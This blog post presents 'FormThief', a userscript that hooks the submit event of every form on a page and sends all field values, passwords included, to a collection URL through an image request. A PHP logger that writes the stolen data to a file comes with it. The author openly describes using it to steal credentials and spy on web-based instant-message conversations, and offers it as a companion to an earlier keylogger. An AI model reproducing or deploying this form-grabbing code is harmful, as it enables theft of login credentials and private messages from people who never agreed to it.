«
»

FormJacking

With all the buzz around Clickjacking I had to come up with an article which would contain that word, or at least a part of it. This article could be also named Form Thievery, but it wouldn’t sound that cool, would it?


Last userscript I wrote was a keylogger, which seems that a lot of people have liked, and which for the most common of its use was an overkill.

Why overkill? Because most of those (if not all) who search for a keylogger will use it for stealing credentials. That was also my reason for writing it in the first place, although recently use it for spying web based IM conversations >:). Also may have been circumvented by most common anti-keylogger tricks, like on-screen keyboards.

FormThief (that’s how I named the userscript) even if not perfect, a.k.a. authentication fails in places where forms have an associated an action on the submit event (such example may be login.yahoo.com) will be quite enough for most of the cases you’ll want it. The script has the following code:

(function(){
    var num = document.forms.length;
    for(var i=0;i<num;i++) {
        unsafeWindow.document.forms[i].addEventListener('submit', function(e) {
            var form = e.currentTarget;
            var num = form.length;
            var send = '?';
            for(var i=0;i<num;i++) {
                send += form[i].name + '=';
                send += form[i].value + '&';
            }
            send += 'ThiefedURL=' + unsafeWindow.location;
            new Image().src = 'http://127.0.0.1/fj.php'+encodeURI(send);
            return true;
        }, true);
    }
})()

view/install

As in the junkylogger have used unsafeWindow for accessing the content, and the Image object to send the logged/hijacked data. As for the logging php file you could take the same approach as I did:


$str = "\n\n";
foreach($_GET as $key=>$val) {
    $str .= $key.'['.$val.']'."\n";
}

$fp = fopen('data.txt', 'a');
fwrite($fp, $str);
fclose($fp);

Nothing new in the concept, just wanted to share it with you because I felt that it is a good addition to the Userscript keylogger, completing it where it could have failed and vice versa. With well crafted @include, @exclude metadata’s the two userscripts can make wonders, at least for me ;)

UPDATE: modified the userscript, attached the function as kl suggested, know it works in any page (even login.yahoo.com). Also now appending the ThiefedURL parameter to see in the logs which form was hijacked.

Posted in Code,Toolbox
Tags:

Leave a Reply